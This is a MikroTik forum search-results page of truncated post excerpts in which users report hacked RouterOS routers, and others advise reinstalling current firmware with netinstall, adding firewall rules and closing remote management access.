Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

The CIA hacks many routers, incl. MikroTik routers. And: the CIA tools have been stolen and now blackhat hackers worldwide use them. Search for details of CVE-2018-14847 and CVE-2019-3943 S.a. https://wikileaks.org/ciav7p1/ https://forum.mikrotik.com/viewtopic.php?t=119308 https://forum.mikrotik.com...
by mutluit
Sun May 24, 2020 5:05 pm
Forum: Beginner Basics
Topic: A desperate cry for help.
Replies: 5
Views: 1315

Re: A desperate cry for help.

@PhilipParkes, can you also try the "Pro" version of that Nvidia device?
And: how fast is your WAN link?
And: since you say the error started only 4 days ago: maybe your device could have been hacked and something else is running in parallel... Check... :-)
by anav
Sun May 24, 2020 4:58 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

First thing you need to do is remove the MT from the internet connection. The next thing you need to do is NET REINSTALL with the latest firmware. So download the latest firmware from Mikrotik and then conduct the NETINSTALL process. Once done, then start from scratch to redo your network setup. If ...
by sindy
Sun May 24, 2020 4:57 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

It was running OS version v6.37.1 and current firmware was 3.29. ... How did this happend? ... However, keep in mind i had a strong password. A number of vulnerabilities, including ones allowing to break in without knowing the password, has been fixed since 6.37.1, so this is the most likely reason...
by bpwl
Sun May 24, 2020 4:55 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

Re: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

RouterOS 6.37.1 is from nov 2016 almost 4 years old. The Mikrotiks were hacked worldwide several times since then: https://www.bankinfosecurity.com/cryptominers-keep-hacking-unpatched-mikrotik-routers-a-11627 The hackers keep taking over unpatched Mikrotik routers. ...
by Defraged
Sun May 24, 2020 4:38 pm
Forum: General
Topic: My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]
Replies: 23
Views: 4051

My MikroTik is Hacked!!! Found file 7wmp0b4s.rsc [SOLVED]

Hello Today i noticed that my home router (RB962UiGS) was hacked. It was running OS version v6.37.1 and current firmware was 3.29. The hacker or who ever it was have created a script that is called " 7wmp0b4s.rsc " and scheduled to run at every hour. ...
by pe1chl
Fri May 15, 2020 11:46 am
Forum: Announcements
Topic: v6.47beta [testing] is released!
Replies: 269
Views: 124077

Re: v6.47beta [testing] is released!

I think they are fiddling with the download server, the situation varies by the hour. Earlier today it showed the release notes for version 5.9 !
Maybe it was restored from a backup. Hopefully it wasn't hacked.
by amrobx
Wed May 13, 2020 4:15 pm
Forum: General
Topic: Winbox - router does not support secure connection
Replies: 4
Views: 1421

Re: Winbox - router does not support secure connection

I would try to do a netinstall and start from scratch. For some reason, I am thinking about a hacked router in this case. That’s what I was worried about too. Luckily it turned out to be stupidity on my part. I had a script that disabled the loopback interface, which ...
by rambi
Wed May 13, 2020 6:03 am
Forum: General
Topic: Reset sxtsq 5 ac issue - need help
Replies: 6
Views: 913

Re: Reset sxtsq 5 ac issue - need help

... all? I used netinstall on rb750 and haplite several times, all ok. but on this sxtsq, it's very confusing. I have all the tools, sir. my sxtsq was hacked by someone and the password has been changed. but when I try to reset, something like that happens. is there something wrong? or is there a special ...
by inteq
Tue May 12, 2020 11:13 pm
Forum: General
Topic: Winbox - router does not support secure connection
Replies: 4
Views: 1421

Re: Winbox - router does not support secure connection

I would try to do a netinstall and start from scratch.
For some reason, I am thinking about a hacked router in this case.
by looka
Mon May 04, 2020 12:32 am
Forum: Beginner Basics
Topic: multiple gateways & routing [SOLVED]
Replies: 18
Views: 3883

Re: multiple gateways & routing [SOLVED]

... s, which does not have fancy switch chip to help cpu. On the other hand, I was told it is nice to move server out of main network, as it can be hacked through services, running on it...
by mkx
Wed Apr 29, 2020 5:24 pm
Forum: General
Topic: PPPoE client connected but no internet [SOLVED]
Replies: 10
Views: 2753

Re: PPPoE client connected but no internet [SOLVED]

... dial-on-demand=no on pppoe-client configuration. And enable your last firewall rule (drop everything else), without it your router will get hacked within minutes after you establish internet connectivity. At the same time, add another rule similar to the last one, but using in-interface=pppoe-out1
by lexell
Thu Apr 23, 2020 12:24 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

The output of that print is completely empty (as expected - noone else has access to the router and I don't use the default config setup at all, I always do a reset to a blank no-config state and only configure the desired fuctionality from scratch). As do I, without fail, but not running the defau...
by Jotne
Thu Apr 23, 2020 8:41 am
Forum: General
Topic: Security: Address(es) of MikroTik update server(s) needed [SOLVED]
Replies: 10
Views: 2803

Re: Security: Address(es) of MikroTik update server(s) needed [SOLVED]

NSA backdoor, botnets, ransomware, bugs, ... I read in old news and postings that in 2017/2018 the NSA already had hacked the RouterOS --> just research yourself. Here are the statements of MikroTik dated 30th May, 2018 and later: https://blog.mikrotik.com/security/www-vulnerability.html ...
by macsrwe
Thu Apr 23, 2020 3:02 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

The output of that print is completely empty (as expected - noone else has access to the router and I don't use the default config setup at all, I always do a reset to a blank no-config state and only configure the desired fuctionality from scratch). As do I, without fail, but not running the defau...
by lexell
Thu Apr 23, 2020 1:57 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

My next suggestion was going to be for you to run /system default-configuration script print and peruse the output for matching strings, in case someone had established a non-standard default configuration on your router. But if mrz says this is a known bug, then it is. (I bet if you ran the comman...
by mutluit
Wed Apr 22, 2020 11:47 pm
Forum: General
Topic: Security: Address(es) of MikroTik update server(s) needed [SOLVED]
Replies: 10
Views: 2803

Re: Security: Address(es) of MikroTik update server(s) needed [SOLVED]

... to fetch html pages etc. NSA backdoor, botnets, ransomware, bugs, ... I read in old news and postings that in 2017/2018 the NSA already had hacked the RouterOS --> just research yourself. Here are the statements of MikroTik dated 30th May, 2018 and later: https://blog.mikrotik.com/security/www-vulnerability.html ...
by Maajed
Tue Apr 21, 2020 8:12 pm
Forum: Beginner Basics
Topic: Mikrotik login failure from haker outside
Replies: 6
Views: 1609

Re: Mikrotik login failure

No, not me, it looks like it's a hacked server attempt from outside
by pe1chl
Mon Apr 13, 2020 3:35 pm
Forum: Beginner Basics
Topic: Graphing issue
Replies: 8
Views: 1427

Re: Graphing issue

... in reaching the webfig or graphs. Either there is a config error in your firewall or IP services settings, or indeed the router already has been hacked by outsiders who have changed things to assure their access. When you want to access a router from outside (e.g. a remotely placed router where ...
by macsrwe
Sat Apr 11, 2020 3:03 am
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

My next suggestion was going to be for you to run /system default-configuration script print and peruse the output for matching strings, in case someone had established a non-standard default configuration on your router. But if mrz says this is a known bug, then it is. (I bet if you ran the command...
by lexell
Fri Apr 10, 2020 4:59 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Freshly rebooted and I have these environment variables. Any ideas what they are? They look like scripts? And some are quite long. If I delete them, they'll remain deleted until the next reboot. They are global functions . From the behavior you describe, your router executes a script on startup tha...
by macsrwe
Thu Apr 09, 2020 3:34 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Freshly rebooted and I have these environment variables. Any ideas what they are? They look like scripts? And some are quite long. If I delete them, they'll remain deleted until the next reboot. They are global functions . From the behavior you describe, your router executes a script on startup tha...
by lexell
Wed Apr 08, 2020 8:25 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Experiencing the same on a hAP ac for the past few stable releases incl. v6.46.5. Not happening on a hAP lite though (both always upgraded to the same version in parallel). Might be triggered by something in the configuration - hAP ac has a more complex config, some startup scripts and also a few mo...
by anav
Mon Mar 09, 2020 2:45 pm
Forum: General
Topic: Router is infection by virus coinhive
Replies: 8
Views: 9641

Re: Router is infection by virus coinhive

CZFAN, were the instructions ever to keep an old corrupted hacked config in place EVER? Does it even sound logical lol? c'mon having an alzyheimers moment or something?? Its not like you dont know how scripts work etc......... and you know how smart hackers ...
by ingdaka
Wed Feb 26, 2020 9:27 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

Like Strods wrote! This is an old script that is from old version of ROS. Also Do you use a master password for Winbox? If not then you should know that if you export addresses.wbx this is an unencrypted file that can be opened with notepad and to read all IP/username/passwords saved there!
by strods
Wed Feb 26, 2020 7:23 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Re: Mikrotik OS 6.45.6 Hacked

When was the last time you did change the password? Is it possibe that it has not been changed since your router was running RouterOS v6.42 or an older version?
by joshuachaw
Wed Feb 26, 2020 6:35 am
Forum: General
Topic: Mikrotik OS 6.45.6 Hacked
Replies: 10
Views: 5148

Mikrotik OS 6.45.6 Hacked

Just to share that yesterday we discovered one of the public facing mikrotik being hacked. we do not think password leaked and it should be via some vulnerability hack. Below is the details : Model : Routerboard 3011UiAS (CloudCore) OS version : 6.45.6 IP Services ...
by morheb
Sun Feb 16, 2020 6:31 pm
Forum: General
Topic: is my hotspot hacked??
Replies: 0
Views: 1528

is my hotspot hacked??

... i compared the mac addresses in wifi registration to the active users, tge registered wifi users who has traffic are bot in the active tab Am i hacked? What can i do? Some users use the hotspot and vouchers, i tried to use internet without entering vouchers but i ffailed Help please
by Ixam
Wed Feb 12, 2020 10:39 am
Forum: General
Topic: ccr1036-8g-2s+EM prevent outgoing ddos
Replies: 0
Views: 1424

ccr1036-8g-2s+EM prevent outgoing ddos

... RouterOS and for example auto-null the Server that is doing it? Not talking about inbound, we are talking if OUTBOUND For example one server gets hacked and goes rogue or a rogue customer is doing that.
by r00t
Tue Feb 11, 2020 6:19 pm
Forum: General
Topic: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?
Replies: 7
Views: 3592

Re: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?

After reformatting NAND memory, your router can only be neinstalled, all normal OS have been wiped in the process. Look in the documentation for your hardware to see which port you can use to netinstall and use just direct cable from router to your PC, with fixed IP set in windows etc... entire proc...
by tachyonnoc
Tue Feb 11, 2020 1:11 pm
Forum: General
Topic: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?
Replies: 7
Views: 3592

Re: Mikrotik device has been hacked and the hack script disable many things. What should I do?

... This is what you need to do for your OTHER routers: https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router Hi Normis, My Hex Lite got hacked, now im facing the same situation as this thread, I tried to press the button for 5 min but now my hex is looking like its bricked, what to do ...
by tachyonnoc
Tue Feb 11, 2020 1:10 pm
Forum: General
Topic: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?
Replies: 7
Views: 3592

Re: Mikrotik device has been hacked and the hack script disable many things. can't Netinstall. What should I do?

Hi Normis, My Hex Lite got hacked, now im facing the same situation as this thread, I tried to press the button for 5 min but now my hex is looking like its bricked,
what to do ??
Please help
by pe1chl
Tue Feb 04, 2020 12:23 pm
Forum: Beginner Basics
Topic: I need help setting up a RouterBoard hex with a Draytek Vigor 130
Replies: 16
Views: 2446

Re: I need help setting up a RouterBoard hex with a Draytek Vigor 130

The risk of a hacked router when using old firmware and no firewall or the default firewall of old firmware is quite real! In any case, go back to system->packages, select the "stable" channel and download&install 6.46.2 Then, reset ...
by mkx
Mon Feb 03, 2020 11:15 pm
Forum: Beginner Basics
Topic: I need help setting up a RouterBoard hex with a Draytek Vigor 130
Replies: 16
Views: 2446

Re: I need help setting up a RouterBoard hex with a Draytek Vigor 130

... is running very old, vulnerable ROS version router is running no firewall what so ever, making it open for any attacker ... and is bound to be hacked within minutes after it connects to internet I'm not very familiar with different quick-set modes so I can't suggest which one would be best ...
by mkx
Sat Jan 25, 2020 2:02 pm
Forum: General
Topic: IP from WAN subnet on port [SOLVED]
Replies: 3
Views: 697

Re: IP from WAN subnet on port [SOLVED]

... ROS (and routerboot) to some recent (either stable or "long term") version reset device to factory default disconnect device from WAN not to get hacked while you change things connect to device via ether2-4 using MAC connection (winbox) remove ether5 from bridge move LAN IP config from bridge ...
by msatter
Wed Jan 08, 2020 6:33 pm
Forum: General
Topic: [Interpol] Operation Goldfish Alpha
Replies: 0
Views: 1049

[Interpol] Operation Goldfish Alpha

... INTERPOL’s ASEAN Cyber Capability Desk launched Operation Goldfish Alpha in June 2019. At that time, intelligence identified more than 20,000 hacked routers in the region, accounting for 18 per cent of infections globally. With support from INTERPOL’s Cyber Foundation project, an operational ...
by aradicev
Fri Jan 03, 2020 8:23 pm
Forum: General
Topic: Cannot update RouterOS
Replies: 2
Views: 630

Re: Cannot update RouterOS

Fortunately my routers are not hacked. I have compared the current configuration with quite old backups and there are no suspicious changes. Also, I don't think that my ISP was responsible for this, it was rather an malicious attack undergoing. ...
by mkx
Fri Jan 03, 2020 12:41 pm
Forum: General
Topic: Cannot update RouterOS
Replies: 2
Views: 630

Re: Cannot update RouterOS

Either somebody hacked your routers or your ISP is redirecting http traffic. If routers are hacked, then careful config examination likely shows some config which shoukln't be there (proxy enabled, some scripts, DNS redirects, you ...
by Sob
Mon Dec 30, 2019 1:20 am
Forum: Beginner Basics
Topic: Opening 3 different WAN devices settings in browser/winbox ? [SOLVED]
Replies: 12
Views: 2457

Re: Opening 3 different WAN devices settings in browser/winbox ? [SOLVED]

It works, but everything else is still allowed. So for example if someone hacked your other routers/modems, they would be able to connect to any device in main LAN. It probably won't happen, so it should be ok. But it doesn't hurt to use more secure config.
by el berto
Mon Dec 09, 2019 1:15 pm
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

a. Use netinstall to latest firmware if sense one is hacked So if RouterBoard has been hacked just rewriting firmware using netinstall will solve issue to have clean (not corrupted) firmware, right? I was using RB750 with an old release 6.22 or 6.30, ...
by xvo
Fri Nov 29, 2019 2:50 pm
Forum: General
Topic: Drop unwanted port-forwarding connections
Replies: 6
Views: 1241

Re: Drop unwanted port-forwarding connections

... If he is clever/brave/skilled enough to add a WAN interface but not enough add it to the interface list, everything works, but he is likely to get hacked, so he'll get mad about the router later, but more :) Exactly. And having default firewall to be what it is now, it seems that Mikrotik engineers ...
by sindy
Fri Nov 29, 2019 2:38 pm
Forum: General
Topic: Drop unwanted port-forwarding connections
Replies: 6
Views: 1241

Re: Drop unwanted port-forwarding connections

... If he is clever/brave/skilled enough to add a WAN interface but not enough add it to the interface list, everything works, but he is likely to get hacked, so he'll get mad about the router later, but more :)
by globusr
Tue Nov 26, 2019 4:36 pm
Forum: General
Topic: Can't open site from WiFi on hAP ac
Replies: 1
Views: 312

Can't open site from WiFi on hAP ac

... but just can't open site. No proxies, no specific settings. Please help what is my exam actions to re solve, I'm aware my Mikrotik became bot ... hacked. Thx,
by ksthree
Wed Nov 20, 2019 6:01 pm
Forum: General
Topic: Firewall killing NAT rule
Replies: 5
Views: 1008

Re: Firewall killing NAT rule

... such that it only allows you to log in via our Public IP or the respective RB's local IPs. We had a recent event where one of our main servers got hacked. So we ramped up security everywhere.
by anav
Wed Nov 20, 2019 3:11 pm
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

... what I interpreted. Finally, it seems best practices still prevent problems, common sense!! a. Use netinstall to latest firmware if sense one is hacked Prevent a. by NOT opening winbox to the WAN side, use only VPN to access router externally Prevent a. by NOT allowing external access to DNS ...
by amojak
Wed Nov 20, 2019 12:28 pm
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

... no static entries in the dns setup for our core router. our "ISP" is level 3/centurylink and i find it difficult to consider their DNS servers are hacked To add to this this is occuring on every other core MT router on other connections with other DNS servers too. So in summary it looks to be an ...
by Znevna
Wed Nov 20, 2019 10:45 am
Forum: General
Topic: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?
Replies: 20
Views: 2507

Re: erm what is FW 6.55.6 , no mention of it here yet routers say it is current stable?

... you have nothing in static DNS regarding upgrade.mikrotik.com or download.mikrotik.com and you're using the ISP's DNS servers, well, your ISP is hacked. It might even force redirect all your queries. Too many options. You have to check which one is it, doing local queries using different servers ...
by r00t
Sat Nov 09, 2019 7:05 pm
Forum: General
Topic: RouterBoot does not accept any key
Replies: 6
Views: 1050

Re: RouterBoot does not accept any key

... supported by tools like OpenOCD, then find where in memory is the routerboot configuration (test it first on a working RB), then finally fix the hacked ones.... it's a lot of work, if you have 100 RB to fix, it may be worth it, but for one or two... probably not... To desolder and edit the NAND ...
by manusamir
Sat Nov 09, 2019 1:35 pm
Forum: General
Topic: RouterBoot does not accept any key
Replies: 6
Views: 1050

Re: RouterBoot does not accept any key

Ok, but the router is hacked (no my password and interfaces shutted down) ..I can't access to the routerboard so the only method to access is reset it with netinstall with serial cable but also this method is locked...Is there another moethod?


Very thanks
by mkx
Thu Nov 07, 2019 1:24 pm
Forum: Beginner Basics
Topic: Issue connecting to RB951 via Winbox - MAC works, IP does not
Replies: 4
Views: 960

Re: Issue connecting to RB951 via Winbox - MAC works, IP does not

There have been reports when ROS devices hacked have had installed some malware not exposed in any configuration (GUI, export, ...). So when it's prooven that device was hacked, the most safe course of action would be: find last known good configuration ...
by rootwilliamson
Thu Nov 07, 2019 10:06 am
Forum: Useful user articles
Topic: Which VPN protocol is best?
Replies: 14
Views: 7691

Which VPN protocol is best?

... I use pptp protocol for streaming. On last weekend with my friends, I was using Facebook from my smartphone. In a while my smartphone is going hacked and all data that already stored in my phone was too. At that time, I said “What the fuck is this” but one of my friend suggest me to don’t use ...
by vader7071
Thu Nov 07, 2019 2:24 am
Forum: Beginner Basics
Topic: Issue connecting to RB951 via Winbox - MAC works, IP does not
Replies: 4
Views: 960

Re: Issue connecting to RB951 via Winbox - MAC works, IP does not

... However I found the line "set winbox" read as "set winbox disabled=yes". The more I dug, the more I found, and I think my setting may have been hacked. I re-enabled winbox and went in and undid what I found (socks had been turned on, and I had found a new user added, among other things). Luckily, ...
by msatter
Wed Nov 06, 2019 3:34 pm
Forum: General
Topic: NordVPN
Replies: 19
Views: 5350

Re: NordVPN

NordVPN was hacked recently. I have seen a lot of user accounts leaked on pastebins and forums. I would suggest users to stay away from that provider for a while
Information about this hack from the side of NordVPN:

https://nordvpn.com/blog/official-respo ... er-breach/
by shrekkd
Wed Nov 06, 2019 12:45 pm
Forum: General
Topic: NordVPN
Replies: 19
Views: 5350

Re: NordVPN

NordVPN was hacked recently. I have seen a lot of user accounts leaked on pastebins and forums. I would suggest users to stay away from that provider for a while
by tokunbo
Tue Nov 05, 2019 11:59 am
Forum: Beginner Basics
Topic: Router reset not working: couldnt reset configuration-not permitted(9)
Replies: 6
Views: 1330

Router reset not working: couldnt reset configuration-not permitted(9)

Hello sirs, I m trying to recover a hacked microtik router. Here are my observations: 1) I can only login via Winbox >> neigbhors..... as my normal user 'admin'...in the "write" group 2) Via winbox >> terminal, the welcome screen shows 'Device ...
by Dmurr
Mon Nov 04, 2019 3:18 pm
Forum: General
Topic: flash hack mikrotik
Replies: 4
Views: 920

flash hack mikrotik

... В настройках windows 10.10.10.10/24, в настройках netinstall - net booting - Boot server enabled 10.10.10.11. Как прошить заново чистую прошивку? Hacked 2011. The provider receives arp requests to the network. 6.40.5 I try to fill in the new firmware 6.45.7, but the router does not want to be ...
by manusamir
Sat Nov 02, 2019 5:05 pm
Forum: General
Topic: RouterBoot does not accept any key
Replies: 6
Views: 1050

RouterBoot does not accept any key

Hi all, My question is about RouterBoot booter 6.43.16 of an hacked rb2011. I connected with serial cable my RB2011 and I want to install RouterOs from Netinstall but I got problem because not key are accepted..in my case is "o - boot device". Any key ...
by pe1chl
Fri Nov 01, 2019 5:55 pm
Forum: General
Topic: Configuration not saved, or reverted
Replies: 3
Views: 902

Re: Configuration not saved, or reverted

... nice, sometimes not so nice...) When there are config changes that you did not make yourself, consider the possibility that the device was hacked. When it has winbox open to everyone on internet, that is quite likely to happen (especially when you did not keep it uptodate).
by CZFan
Thu Oct 17, 2019 7:29 pm
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

This topic so far: "I heard somebody got hacked"; "Me too"; "I have no firewall and use admin user". So please: - Use latest version (at least "long-term") - If you upgraded from a vulnerable older version, make a new user and new password, delete ...
by normis
Thu Oct 17, 2019 4:34 pm
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

This topic so far: "I heard somebody got hacked"; "Me too"; "I have no firewall and use admin user". So please: - Use latest version (at least "long-term") - If you upgraded from a vulnerable older version, make a new user and new password, delete ...
by Exiver
Thu Oct 17, 2019 4:10 pm
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

... is disabled except SSH. Leads me to the conclusion that there is either an exploit for any other service (winbox, api?) or the admins got hacked and credentials were stolen from their machines..
by cecconet
Thu Oct 17, 2019 10:24 am
Forum: General
Topic: Is there an new exploit going around?
Replies: 57
Views: 14576

Re: Is there an new exploit going around?

I can confirm, same here. Luckly, We got only about 10 mikrotik hacked. I think in at one case the use api port 8728. We have variuos firmware versions. The last year has been very tougth with a lot of exploits for Mikrotik routeros. It's because mikrotik ...
by mkx
Thu Oct 10, 2019 3:40 pm
Forum: Beginner Basics
Topic: DDNS does not let me access my Router [SOLVED]
Replies: 15
Views: 3513

Re: DDNS does not let me access my Router [SOLVED]

... able to do so from internet, it's clear that your ISP is doing some firewalling (and it seems to be a good thing, otherwise your router would be hacked by now). Before you get ISP to release firewall rules on your WAN IP, I suggest you to get some good firewall up & running. You should probably ...
by sindy
Wed Oct 09, 2019 10:39 pm
Forum: General
Topic: Microtik router with existing network
Replies: 64
Views: 8570

Re: Microtik router with existing network

... need to be accessible from outside. If they were accessible from the internet for some time, there is no guarantee that the machine has not been hacked during that time. So the only way to make sure that the machine is safe is to disconnect it from the internet, export the current configuration ...
by Michaelcrapse
Wed Oct 09, 2019 6:58 pm
Forum: RouterBOARD hardware
Topic: 100 % CPU on some Routerboards
Replies: 9
Views: 3347

Re: 100 % CPU on some Routerboards

... of the /export that you first have examined for any strange things. When there is old firmware on it and it misbehaves, it most likely has been hacked and there now is malware running on it. Yes, just tried this now. Issue seems to persist. These units were definitely not hacked. No possible ...
by pe1chl
Tue Oct 08, 2019 11:49 pm
Forum: RouterBOARD hardware
Topic: 100 % CPU on some Routerboards
Replies: 9
Views: 3347

Re: 100 % CPU on some Routerboards

... of the /export that you first have examined for any strange things. When there is old firmware on it and it misbehaves, it most likely has been hacked and there now is malware running on it.
by nozz
Tue Sep 24, 2019 3:28 pm
Forum: RouterBOARD hardware
Topic: CRS125-24G-1S-RM brick
Replies: 9
Views: 2180

CRS125-24G-1S-RM brick

Hello. The devicewas hacked by a known vulnerability. The admin was given - read, the new admin full. Protected bootloader is set and reformat-hold-button - 4:59. After resetting by reset, fell into a cyclic reboot at the loading kernel ...
by electravis
Thu Sep 12, 2019 6:20 pm
Forum: General
Topic: Hacked router Possible password
Replies: 0
Views: 880

Hacked router Possible password

So I thought maybe this will help someone else who may have got hacked and didn find it yet. Came across one router that was hacked had no way to get to it to reset it. Luckily I have it email me backup configs so after lots of searching and trial and error, ...
by Jotne
Tue Sep 03, 2019 10:53 pm
Forum: Beginner Basics
Topic: Can Routers Get Infected?
Replies: 5
Views: 1429

Re: Can Routers Get Infected?

What router do you have, and what firmware are you on?
Old firmware have been hacked.
by CZFan
Thu Aug 08, 2019 1:00 am
Forum: General
Topic: RB951G-2HnD dissapears
Replies: 4
Views: 799

Re: RB951G-2HnD dissapears

I suspect these devices were hacked, hence going offline due to the very old version.

My suggestion will to build a l2 link to the CRs, then connect these faulty ones to crs and do a netinstall across the l2 link
by CrimzinZA
Fri Aug 02, 2019 11:47 am
Forum: General
Topic: Is there a Firmware versions vulnerability list
Replies: 1
Views: 685

Is there a Firmware versions vulnerability list

... are vulnerable and which for "now" are not. I see some older firmware on some devices like 6.35.4 and I personally know a third party that was hacked but not sure which firmware they ran. Obviously after that they upgraded, that sorted them out. Is there a list somewhere? Obviously if something ...
by R1CH
Thu Aug 01, 2019 12:15 pm
Forum: General
Topic: Winbox login: authentication failed, maybe due to bad blocks?
Replies: 5
Views: 925

Re: Winbox login: authentication failed, maybe due to bad blocks?

6.19 is very old and the device is likely hacked, you should netinstall a secure version.
by anav
Wed Jul 31, 2019 6:01 pm
Forum: General
Topic: port forwarding Source DDNS [SOLVED]
Replies: 18
Views: 2523

Re: port forwarding Source DDNS [SOLVED]

... I would be really keen on better security. If the logging information was valuable ditto (in other words, I dont get paid because the logs were hacked and dont exist I would be really keen on better security) If the devices themselves and the information were hacked and destroyed, how long would ...
by pe1chl
Sat Jul 27, 2019 9:08 am
Forum: Beginner Basics
Topic: Permit Winbox
Replies: 11
Views: 1964

Re: Permit Winbox

... several problems with Winbox security in the recent past, and people that have done what was described here have found that their routers were hacked. MikroTik thinks that the current version is no longer vulnerable to such attacks, but so they did for previous versions and there were some ...
by mkx
Sat Jul 13, 2019 1:45 pm
Forum: Beginner Basics
Topic: RouterOS v6.41.4 access to admin panel -password problem [SOLVED]
Replies: 9
Views: 2341

Re: RouterOS v6.41.4 access to admin panel -password problem [SOLVED]

... want to, go ahead, I'm not going to try to stop you. Actually that might be a good idea, there are some device states (mainly after they've been hacked) from which it's only possible to recover by netinstalling the device.
by arielgrin
Wed Jul 10, 2019 10:49 pm
Forum: General
Topic: Very high sector writes
Replies: 26
Views: 3108

Re: Very high sector writes

I don't see how could it get hacked. There are no open ports nor forwarded ports on the wan interface. None of the admin tools, like webfig or ssh are open to the exterior. The only one using the router is me.
by vgdorneles
Mon Jul 08, 2019 9:44 pm
Forum: General
Topic: [Feature Request] Switch-cpu as a romon port and Comment for switch rules
Replies: 0
Views: 642

[Feature Request] Switch-cpu as a romon port and Comment for switch rules

... "all" ports). The second request is to be able to add comments to Switch Rules. Some switches mine already have more than 30 rules, and I have to hacked my brain trying to understand them every time I have to modify something.
by sid5632
Mon Jul 08, 2019 7:08 pm
Forum: General
Topic: Very high sector writes
Replies: 26
Views: 3108

Re: Very high sector writes

Yes, hacked.
by arielgrin
Mon Jul 08, 2019 3:37 pm
Forum: General
Topic: Very high sector writes
Replies: 26
Views: 3108

Re: Very high sector writes

Will try netinstall and report. Just curious, compromised how? Do you mean hacked? Or something else?
by anav
Wed Jul 03, 2019 8:31 pm
Forum: Beginner Basics
Topic: Help needed with config
Replies: 9
Views: 1276

Re: Help needed with config

This is not a factory refresh, where are all the default firewall rules??
I hope you realize that the default rules are there to protect your router from being hacked!!
by mkx
Wed Jul 03, 2019 4:58 pm
Forum: Beginner Basics
Topic: Guest wifi on multiple APs
Replies: 9
Views: 2394

Re: Guest wifi on multiple APs

If the published config for your router is complete, then your router is probably already hacked because you don't have any firewall protection. I suggest you to start from default firewall filter list, it is a decent starting point. Anyhow, MT routers perform two (very) ...
by rjscomms
Fri Jun 21, 2019 3:04 am
Forum: Scripting
Topic: script that sends an email if the temperature of the Mikrotik router gets too high
Replies: 2
Views: 1344

Re: script that sends an email if the temperature of the Mikrotik router gets too high

Hello, this is what I use at the moment. It is hacked from someone else 8-} :log info ("$[/system health get temperature] $[/system health get voltage]") :if ([/system health get temperature]>45) do={/tool e-mail send to="me@somewhere.net" subject=[/system ...
by krafg
Sat Jun 15, 2019 7:56 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

To not get anymore these logs, go to IP -> Services and limit the access to local network or disable that you don't need.

Regards.
by Pea
Sat Jun 15, 2019 2:58 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

Why do you think someone hacked in?
Your log shows only failed logins due to your poor firewall. You should rethink your firewall and running services.
by darkuek
Sat Jun 15, 2019 2:34 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

... first we dont know what firmware he had to begin with so its an assumption not fact if his firmware is or is not up to date. Secondly, if there is hacked firmware the only 'safe' method for an update or reset is to dowload a clean copy of the latest firmware and apply it via netinstall!! As to ...
by darkuek
Sat Jun 15, 2019 2:31 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

... first we dont know what firmware he had to begin with so its an assumption not fact if his firmware is or is not up to date. Secondly, if there is hacked firmware the only 'safe' method for an update or reset is to dowload a clean copy of the latest firmware and apply it via netinstall!! As to ...
by Javadeb
Fri Jun 14, 2019 7:50 am
Forum: RouterBOARD hardware
Topic: crs 326 24g 2s hard reset not working
Replies: 1
Views: 789

crs 326 24g 2s hard reset not working

Hi All
